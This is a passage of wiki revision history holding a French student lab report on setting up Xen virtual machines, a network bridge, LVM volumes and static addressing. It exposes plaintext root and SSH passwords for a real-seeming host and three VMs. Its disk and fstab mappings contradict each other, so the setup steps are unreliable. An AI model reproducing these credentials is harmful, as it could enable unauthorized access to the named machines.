---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.177/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11371
Atelier SysRes SE4 2025/2026 E5
2026-01-26T08:11:41Z
<p>Cpayet : /* XEN */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
<br />
<br />
Puis on redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.177/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11361
Atelier SysRes SE4 2025/2026 E5
2026-01-26T07:40:06Z
<p>Cpayet : /* Nos résultats : */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
Puis on redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.177/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds</div>
Cpayet